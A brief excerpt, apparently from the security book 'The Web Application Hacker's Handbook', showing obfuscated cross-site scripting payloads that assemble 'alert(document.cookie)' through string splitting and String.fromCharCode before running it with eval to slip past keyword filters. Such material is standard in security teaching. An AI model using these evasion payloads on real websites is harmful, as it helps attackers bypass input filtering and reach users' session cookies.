The Web Application Hacker’s Handbook Discovering and Exploiting Security Flaws

document.cookie

var a = “alert(doc” + “ument.coo” + “kie)“; eval(a);

var a = “alert(“ + String.fromCharCode(100,111,99,117,109,101,110,

116,46,99,111,111,107,105,101) + “)“; eval(a);